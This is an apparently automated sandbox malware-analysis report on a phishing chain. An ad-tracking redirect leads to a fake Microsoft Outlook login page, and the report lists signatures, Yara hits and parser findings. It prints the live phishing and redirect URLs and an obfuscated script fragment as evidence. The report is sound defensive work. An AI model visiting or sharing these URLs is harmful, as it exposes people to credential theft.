Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://m.exactag.com/ai.aspx?tc=d9550673bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41tuskerdigital.com%2Fwinner%2F24968%2F%2FdHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==

Overview

General Information

Sample URL:https://m.exactag.com/ai.aspx?tc=d9550673bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41tuskerdigital.com%2Fwinner%2F24968%2F%2FdHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==
Analysis ID:1467116
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Phishing site detected (based on favicon image match)
Yara detected HtmlPhish54
Phishing site detected (based on image similarity)
Detected non-DNS traffic on DNS port
Found iframes
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
HTML page contains obfuscate script src
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 7104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://m.exactag.com/ai.aspx?tc=d9550673bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41tuskerdigital.com%2Fwinner%2F24968%2F%2FdHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ== MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1944,i,2964829141203310192,9280218611734516593,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
3.7.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    3.7.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      4.8.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        4.10.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          3.7.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
            Click to see the 13 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            Phishing

            barindex
            AI detected phishing page
            Source: https://happylifedon.comLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://happylifedon.com' does not match the legitimate domain name 'outlook.com' associated with Microsoft Outlook. The page prominently displays a login form, which is a common tactic used in phishing attacks. The domain name 'happylifedon.com' is highly suspicious and unrelated to Microsoft or Outlook. Additionally, the use of social engineering techniques is evident as the page mimics the legitimate Outlook login page to deceive users into entering their credentials. DOM: 4.10.pages.csv
            Source: https://happylifedon.comLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://happylifedon.com' does not match the legitimate domain for Microsoft Outlook, which is 'outlook.com'. The page displays a prominent login form, which is a common tactic used in phishing attacks. The domain name 'happylifedon.com' is unrelated to Microsoft or Outlook, making it highly suspicious. The page uses social engineering techniques by mimicking the Outlook login page to deceive users into entering their credentials. There is no CAPTCHA present on the page. Based on these factors, the site is highly likely to be a phishing site. DOM: 4.12.pages.csv
            Source: https://happylifedon.comLLM: Score: 9 brands: Microsoft Outlook Reasons: The URL 'https://happylifedon.com' does not match the legitimate domain for Microsoft Outlook, which is 'outlook.com'. The webpage closely resembles the legitimate Outlook login page, which is a common tactic used in phishing attacks to deceive users into entering their credentials. The presence of a prominent login form and the use of Microsoft's branding further suggest an attempt to mislead users. There are no captchas present, which is often a feature in legitimate login pages to prevent automated attacks. The domain name 'happylifedon.com' is highly suspicious and unrelated to Microsoft Outlook, indicating a high likelihood of phishing. DOM: 4.14.pages.csv
            Phishing site detected (based on favicon image match)
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueMatcher: Template: microsoft matched with high similarity
            Yara detected HtmlPhish54
            Source: Yara matchFile source: 3.7.pages.csv, type: HTML
            Source: Yara matchFile source: 3.7.pages.csv, type: HTML
            Source: Yara matchFile source: 4.8.pages.csv, type: HTML
            Source: Yara matchFile source: 4.10.pages.csv, type: HTML
            Source: Yara matchFile source: 3.7.pages.csv, type: HTML
            Source: Yara matchFile source: 4.8.pages.csv, type: HTML
            Source: Yara matchFile source: 4.10.pages.csv, type: HTML
            Source: Yara matchFile source: 4.12.pages.csv, type: HTML
            Source: Yara matchFile source: 3.7.pages.csv, type: HTML
            Source: Yara matchFile source: 4.8.pages.csv, type: HTML
            Source: Yara matchFile source: 4.12.pages.csv, type: HTML
            Source: Yara matchFile source: 4.10.pages.csv, type: HTML
            Source: Yara matchFile source: 4.14.pages.csv, type: HTML
            Source: Yara matchFile source: 3.7.pages.csv, type: HTML
            Source: Yara matchFile source: 4.8.pages.csv, type: HTML
            Source: Yara matchFile source: 4.12.pages.csv, type: HTML
            Source: Yara matchFile source: 4.14.pages.csv, type: HTML
            Source: Yara matchFile source: 4.10.pages.csv, type: HTML
            Phishing site detected (based on image similarity)
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueMatcher: Found strong image similarity, brand: MICROSOFT
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: Iframe src: https://outlook.office365.com/owa/prefetch.aspx
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: Number of links: 0
            Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/cccwb/0x4AAAAAAAdVmX4Y8IG49PoL/auto/normalHTTP Parser: Base64 decoded: http://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/cccwb/0x4AAAAAAAdVmX4Y8IG49PoL/auto/normal
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
            Source: https://login.live.com/HTTP Parser: Title: Sign in to your Microsoft account does not match URL
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dF&sso_reload=trueHTTP Parser: <input type="password" .../> found
            Source: https://74a4acd7.5eca4a6b0b2ee89fe739b742.workers.dev/?email=trumpsucksdick@mail.ruHTTP Parser: No favicon
            Source: https://74a4acd7.5eca4a6b0b2ee89fe739b742.workers.dev/?email=trumpsucksdick@mail.ruHTTP Parser: No favicon
            Source: https://74a4acd7.5eca4a6b0b2ee89fe739b742.workers.dev/?email=trumpsucksdick@mail.ruHTTP Parser: No favicon
            Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/cccwb/0x4AAAAAAAdVmX4Y8IG49PoL/auto/normalHTTP Parser: No favicon
            Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/cccwb/0x4AAAAAAAdVmX4Y8IG49PoL/auto/normalHTTP Parser: No favicon
            Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/cccwb/0x4AAAAAAAdVmX4Y8IG49PoL/auto/normalHTTP Parser: No favicon
            Source: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD10cnVtcHN1Y2tzZGljayU0MG1haWwucnUmY2xpZW50LXJlcXVlc3QtaWQ9NTAzMWQ3N2EtYzgyMS04NzU3LWRiM2YtMzk4YTBjMjM2ZjM2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU1NjE4NTYzNjY0MTkxMS5iMWU5YTU5ZS1iNGQ4LTRjOTgtODdjNS02MzBiOTA3Yzk0NTkmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFSExCR1pnRnNhakdKZzJTdnBuMmhLdkw0dnY3WjVXU2wyYlM2TnRpd3JrSWlKQlJISkVIaGlneXpCeVFoNU45a00wWGppYUdBUU5PWnZaQm1HUHJOdDc3N2RmNnBfejlpN3I2MVBXODNIdWRma2VWYVpqS0RMZHZGMVNtYnU5X2dFHTTP Parser: No favicon
